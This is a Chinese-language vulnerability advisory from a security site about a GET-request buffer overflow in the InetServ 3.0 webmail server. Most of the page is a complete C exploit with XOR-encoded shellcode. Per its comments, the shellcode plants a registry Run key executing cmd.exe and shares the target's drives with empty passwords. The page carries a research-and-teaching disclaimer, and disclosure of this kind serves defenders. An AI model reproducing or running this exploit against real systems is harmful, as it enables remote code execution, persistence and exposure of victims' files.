首页 -> 安全研究
安全研究
安全漏洞
InetServ 3.0 WebMail 超长GET请求漏洞
发布日期:2000-01-27
更新日期:2000-01-29
受影响系统:
A-V Tronics InetServ 3.0描述:
InetServ是运行在32位Windows系统上的电子邮件服务器(免费软件)。其中的一个webmail程序允许从任何浏览器读取邮件。但程序分析GET请求的代码中有一个没有边界检查的缓冲区,超过537个字节的请求会覆盖EIP寄存器。远程攻击者利用这个溢出可以在主机中运行任意代码。
经过检查,该软件代码中还存在许多没有边界检查的缓冲区,都可能导致类似的安全问题。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* 以下代码可将目标主机的所有驱动器以空口令方式共享。*/
#include "windows.h"
#include "stdio.h"
#include "winsock.h"
#define TARGET_PORT 224
#define TARGET_IP "127.0.0.1"
char aSendBuffer[] =
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAABBBBAAAACCCCAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
"AAAAAAAAAAAAAAAAAAAAAAAAAAADDDDAAAAEEEEAAAAAAAAAAA" \
//mov eax, 0x12ED21FF
//sub al, 0xFF
//rol eax, 0x018
//mov ebx, eax
"\xB8\xFF\x1F\xED\x12\x2C\xFF\xC1\xC0\x18\x8B\xD8" \
// xor ecx, ecx
// mov ecx, 0x46
//LOOP_TOP:
// dec eax
// xor [eax], 0x80
// dec ecx
// jnz LOOP_TOP (75 F9)
"\x33\xC9\xB1\x46\x48\x80\x30\x80\x49\x75\xF9" \
//push ebx
"\x53" \
//mov eax, 77787748
//mov edx, 77777777
"\xB8\x48\x77\x78\x77" \
"\xBA\x77\x77\x77\x77" \
//xor eax, edx
//push eax
"\x33\xC2\x50" \
//xor eax, eax
//push eax
"\x33\xC0\x50" \
// mov eax, 0x77659BAe
// xor eax, edx
// push eax
"\xB8\xAE\x9B\x65\x77\x33\xC2\x50"
//mov eax, F7777775
//xor eax, edx
//push eax
"\xB8\x75\x77\x77\xF7" \
"\x33\xC2\x50" \
//mov eax, 7734A77Bh
//xor eax, edx
//call [eax]
"\xB8\x7B\xA7\x34\x77" \
"\x33\xC2" \
"\xFF\x10" \
//mov edi, ebx
//mov eax, 0x77659A63
//xor eax, edx
//sub ebx, eax
//push ebx
//push eax
//push 1
//xor ecx, ecx
//push ecx
//push eax
//push [edi]
//mov eax, 0x7734A777
//xor eax, edx
//call [eax]
"\x8B\xFB" \
"\xBA\x77\x77\x77\x77" \
"\xB8\x63\x9A\x65\x77\x33\xC2" \
"\x2B\xD8\x53\x50" \
"\x6A\x01\x33\xC9\x51" \
"\xB8\x70\x9A\x65\x77" \
"\x33\xC2\x50" \
"\xFF\x37\xB8\x77\xA7\x34" \
"\x77\x33\xC2\xFF\x10" \
// halt or jump to somewhere harmless
"\xCC" \
"AAAAAAAAAAAAAAA" \
// nop (int 3) 92
// nop (int 3)
// jmp
"\x90\x90\xEB\x80\xEB\xD9\xF9\x77" \
/* registry key path "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" */
"\xDC\xD3\xCF\xC6\xD4\xD7\xC1\xD2\xC5\xDC\xCD\xE9\xE3\xF2" \
"\xEF\xF3\xEF\xE6\xF4\xDC\xD7\xE9\xEE\xE4\xEF\xF7\xF3\xDC\xC3" \
"\xF5\xF2\xF2\xE5\xEE\xF4\xD6\xE5\xF2\xF3\xE9\xEF\xEE\xDC" \
"\xD2\xF5\xEE\x80" \
/* value name "_UR_HAXORED_" */
"\xDF\xD5\xD2\xDF\xC8\xC1\xD8\xCF\xD2\xC5\xC4\xDF\x80" \
/* the command "cmd.exe /c" */
"\xE3\xED\xE4\xAE\xE5\xF8\xE5\xA0\xAF\xE3\x80\x80\x80\x80\x80";
int main(int argc, char* argv[])
{
WSADATA wsaData;
SOCKET s;
SOCKADDR_IN sockaddr;
sockaddr.sin_family = AF_INET;
if(3 == argc)
{
int port = atoi(argv[2]);
sockaddr.sin_port = htons(port);
}
else
{
sockaddr.sin_port = htons(TARGET_PORT);
}
if(2 <= argc)
{
sockaddr.sin_addr.S_un.S_addr = inet_addr(argv[2]);
}
else
{
sockaddr.sin_addr.S_un.S_addr = inet_addr(TARGET_IP);
}
try
{
WSAStartup(MAKEWORD(2,0), &wsaData);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET == s)
throw WSAGetLastError();
if(SOCKET_ERROR == connect(s, (SOCKADDR *)&sockaddr, sizeof(SOCKADDR)) )
throw WSAGetLastError();
send(s, aSendBuffer, strlen(aSendBuffer), 0);
closesocket(s);
WSACleanup();
}
catch(int err)
{
fprintf(stderr, "error %d\n", err);
}
return 0;
}
建议:
暂无。
浏览次数:6779
严重程度:0(网友投票)
绿盟科技给您安全的保障